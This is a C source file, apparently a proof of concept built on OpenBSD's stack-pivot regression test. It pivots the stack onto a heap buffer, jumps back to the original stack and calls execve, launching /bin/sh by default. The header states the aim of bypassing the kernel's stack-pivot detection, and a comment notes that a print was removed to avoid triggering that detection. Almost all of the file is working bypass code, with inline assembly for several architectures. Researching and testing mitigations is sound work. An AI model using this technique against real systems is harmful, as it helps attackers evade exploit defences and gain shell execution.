/*
 * stackpivot-jumpback-bypass.c - pivot the stack and call execve(2)
 * Improved version which bypasses stack pivot detection
 * using the technique described in: https://archive.ph/xS2Fl#selection-13.0-243.52
 *
 * Based in part upon OpenBSD's /usr/src/regress/sys/kern/stackpivot
 * Released under the same license.
 */

#define _GNU_SOURCE
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Size in bytes of the heap allocation that main() uses as the temporary stack. */
#define STACK_SIZE (1024 * 1024)

/*
 * Argument and environment vectors passed to execve(2) by final_exec().
 * Both are assigned once in main() before the first pivot.
 */
static char **target_argv;
static char **target_envp;

/*
 * This global pointer will hold the address in the original stack
 * that we want to pivot back to. main() stores the address of
 * final_exec() in the word it points at; intermediate_stage() passes
 * the pointer to pivot().
 */
static void *original_stack_ptr;

/*
 * pivot:
 *   Points the stack pointer at 'newstack' and transfers control to the
 *   address stored in the word at *newstack. Never returns.
 *
 *   newstack - address of a pointer-sized slot holding the target. On
 *              PowerPC64 ELFv1 the slot holds the address of a function
 *              descriptor; everywhere else it holds a code address.
 *
 *   On x86 the slot is consumed by RET, so SP ends up one word above
 *   'newstack'. On the other architectures SP is left equal to 'newstack'.
 *   The caller is responsible for choosing 'newstack' so that the
 *   resulting SP satisfies the ABI's alignment rules.
 *
 *   __asm__/__volatile__ are used rather than the bare 'asm' keyword so
 *   that the file also builds in strict ISO modes (e.g. -std=c11).
 */
static void pivot(void *newstack)
{
#if defined(__x86_64__)
	/*
	 * x86_64:
	 * 1. Move newstack pointer into RSP.
	 * 2. RET pops the return address (RIP) from the new stack.
	 */
	__asm__ __volatile__("mov %0, %%rsp\n\t"
	                     "ret\n\t"
	                     :
	                     : "r"(newstack)
	                     : "memory");

#elif defined(__aarch64__)
	/*
	 * AArch64:
	 * 1. Load the return address (LR/x30) from *newstack.
	 * 2. Move newstack into SP.
	 * 3. RET jumps to LR.
	 */
	__asm__ __volatile__("ldr x30, [%0]\n\t"
	                     "mov sp, %0\n\t"
	                     "ret\n\t"
	                     :
	                     : "r"(newstack)
	                     : "x30", "memory");

#elif defined(__i386__)
	/*
	 * i386:
	 * 1. Move newstack into ESP.
	 * 2. RET pops EIP.
	 */
	__asm__ __volatile__("mov %0, %%esp\n\t"
	                     "ret\n\t"
	                     :
	                     : "r"(newstack)
	                     : "memory");

#elif defined(__riscv)
	/*
	 * RISC-V (the doubleword load 'ld' is used for the slot):
	 * 1. Load RA from 0(newstack).
	 * 2. Move newstack to SP.
	 * 3. RET (jr ra).
	 */
	__asm__ __volatile__("ld ra, 0(%0)\n\t"
	                     "mv sp, %0\n\t"
	                     "ret\n\t"
	                     :
	                     : "r"(newstack)
	                     : "ra", "memory");

#elif defined(__powerpc64__)
	/*
	 * PowerPC64:
	 * We need to handle both ELFv1 (Function Descriptors),
	 * and ELFv2 (Global Entry). In both cases, *newstack (0(r1))
	 * contains the function pointer.
	 */
	__asm__ __volatile__("mr %%r1, %0\n\t"       /* Switch stack pointer */
	                     "ld %%r12, 0(%%r1)\n\t" /* Load function pointer into r12 */
#if defined(_CALL_ELF) && _CALL_ELF == 2
	                     /* ELFv2: r12 holds the code address. */
	                     "mtctr %%r12\n\t" /* Move code address to CTR */
	                     "bctr\n\t"        /* Branch to CTR */
#else
	                     /* ELFv1: r12 points to the function descriptor. */
	                     "ld %%r0, 0(%%r12)\n\t"   /* r0 = entry point (0 offset) */
	                     "ld %%r2, 8(%%r12)\n\t"   /* r2 = TOC pointer (8 offset) */
	                     "ld %%r11, 16(%%r12)\n\t" /* r11 = Environment (16 offset) */
	                     "mtctr %%r0\n\t"          /* Move entry point to CTR */
	                     "bctr\n\t"                /* Branch to CTR */
#endif
	                     :
	                     : "r"(newstack)
	                     : "r0", "r11", "r12", "ctr", "memory");
#elif defined(__loongarch64)
	/*
	 * LoongArch64:
	 * 1. Load RA ($r1) from 0(newstack).
	 * 2. Move newstack to SP ($r3).
	 * 3. RET (jirl $r0, $r1, 0).
	 */
	__asm__ __volatile__("ld.d $r1, %0, 0\n\t"
	                     "move $r3, %0\n\t"
	                     "jirl $r0, $r1, 0\n\t"
	                     :
	                     : "r"(newstack)
	                     : "$r1", "memory");

#elif defined(__s390x__)
	/*
	 * s390x:
	 * 1. Load RA (r14) from 0(newstack).
	 * 2. Move newstack to SP (r15).
	 * 3. BR r14.
	 *
	 * The operand is used as a base register in "0(%0)", so it needs the
	 * "a" (address register) constraint: with plain "r" the compiler may
	 * pick %r0, and a base of %r0 means "no base", i.e. a load from
	 * absolute address 0.
	 */
	__asm__ __volatile__("lg %%r14, 0(%0)\n\t"
	                     "lgr %%r15, %0\n\t"
	                     "br %%r14\n\t"
	                     :
	                     : "a"(newstack)
	                     : "r14", "memory");


#else
#error "Architecture not supported. Please implement pivot logic."
#endif
	/* Control has left through the asm above; tell the compiler so. */
	__builtin_unreachable();
}

/*
 * final_exec:
 *   Last stage, entered through pivot() once SP is back on the original
 *   stack. Replaces the process image with target_argv[0], passing
 *   target_argv and target_envp. Never returns: if execve(2) fails, the
 *   error is reported on stderr and the process exits with the errno
 *   value as its status.
 */
static void final_exec(void)
{
	printf("[*] Back on main stack. Calling execve...\n");

	/*
	 * execve(2) replaces the process image without flushing stdio
	 * buffers. When stdout is a pipe or a file it is fully buffered, so
	 * without this every diagnostic printed so far would be lost.
	 */
	fflush(stdout);

	execve(target_argv[0], target_argv, target_envp);

	/* Only reached on failure. Save errno: perror() may overwrite it. */
	int saved_errno = errno;
	perror(target_argv[0]);
	_exit(saved_errno);
}

/*
 * intermediate_stage:
 *   Entry point that main() plants on the heap-allocated stack. Its only
 *   action is to pivot again, to the slot recorded in original_stack_ptr.
 */
static void intermediate_stage(void)
{
	/*
	 * Deliberately silent. The diagnostic below is disabled because,
	 * per the original author's note, the write(2) it issues at this
	 * point will trigger detection on OpenBSD:
	 *
	 * printf("[*] Running on heap stack. Pivoting back to main stack at %p...\n",
	 *        original_stack_ptr);
	 */
	pivot(original_stack_ptr);
}

/*
 * Bytes kept free between a planted entry slot and the upper end of the
 * region it lives in. Some ABIs let a callee store into its caller's
 * frame above SP (s390x: a 160-byte register save area; PowerPC64: the
 * LR/CR save words), so the headroom must cover the largest of those.
 */
#define PIVOT_RESERVE 256

/*
 * Offset added to the 16-byte-aligned slot address so that SP has the
 * ABI-mandated alignment once pivot() has entered the target function.
 *
 * - i386: the psABI wants (ESP + 4) 16-byte aligned at function entry
 *   and RET pops a 4-byte slot, so the slot must sit at 8 (mod 16).
 * - x86_64: RET pops 8 bytes from a 16-byte-aligned slot, which already
 *   yields the required RSP = 8 (mod 16).
 * - Other supported architectures: pivot() leaves SP at the slot itself,
 *   which must be 16-byte aligned.
 */
#if defined(__i386__)
#define ENTRY_SLOT_BIAS 8
#else
#define ENTRY_SLOT_BIAS 0
#endif

/*
 * plant_entry:
 *   Aligns 'region_top' down to 16 bytes, steps PIVOT_RESERVE bytes below
 *   it (plus the per-architecture bias), stores the address of 'entry' in
 *   that slot and returns the slot, ready to be handed to pivot().
 */
static uintptr_t *plant_entry(uintptr_t region_top, void (*entry)(void))
{
	uintptr_t aligned_top = region_top & ~(uintptr_t)0xF;
	uintptr_t *slot =
	    (uintptr_t *)(aligned_top - PIVOT_RESERVE + ENTRY_SLOT_BIAS);

	/* "Push" the target; pivot() treats this word as the return address. */
	*slot = (uintptr_t)entry;
	return slot;
}

/*
 * main:
 *   Picks the program to execute (argv[1..] if given, otherwise /bin/sh),
 *   allocates a stack on the heap, plants intermediate_stage() on it and
 *   final_exec() on the original stack, then pivots to the heap stack.
 *   Returns 1 only if the heap allocation fails; the heap block is never
 *   freed because the process image is replaced by execve(2).
 */
int main(int argc, char **argv, char **envp)
{
	/* Set up globals and allocate the stack on the heap. */
	if (argc < 2) {
		static char *default_argv[] = {"/bin/sh", NULL};
		target_argv = default_argv;
	} else {
		target_argv = &argv[1];
	}
	target_envp = envp;

	void *stack_base = malloc(STACK_SIZE);
	if (!stack_base) {
		perror("malloc");
		return 1;
	}

	/* Start at the top of the allocation and align to 16 bytes. */
	uintptr_t stack_top =
	    ((uintptr_t)stack_base + STACK_SIZE) & ~(uintptr_t)0xF;

	/* First hop: the heap stack enters intermediate_stage(). */
	uintptr_t *new_sp = plant_entry(stack_top, intermediate_stage);

	/*
	 * Second hop: a slot on the current (original) stack that enters
	 * final_exec(). The buffer is twice PIVOT_RESERVE bytes so the slot
	 * and the headroom above it both stay inside the buffer, whatever
	 * the buffer's own alignment is.
	 */
	uintptr_t main_stack_buffer[2 * PIVOT_RESERVE / sizeof(uintptr_t)];
	uintptr_t ms_top = (uintptr_t)main_stack_buffer + sizeof(main_stack_buffer);
	original_stack_ptr = plant_entry(ms_top, final_exec);

	printf("[*] Allocated heap stack at %p - %p\n", stack_base,
	       (void *)stack_top);
	printf("[*] Main stack return set to %p\n", original_stack_ptr);
	printf("[*] Pivoting SP to %p and jumping to intermediate_stage...\n",
	       (void *)new_sp);

	/*
	 * Push the diagnostics out while SP is still on the original stack,
	 * so nothing is pending in the stdio buffer during the pivot.
	 */
	fflush(stdout);

	/* All set, go! */
	pivot(new_sp);

	/* Should not be reached. */
	return 1;
}
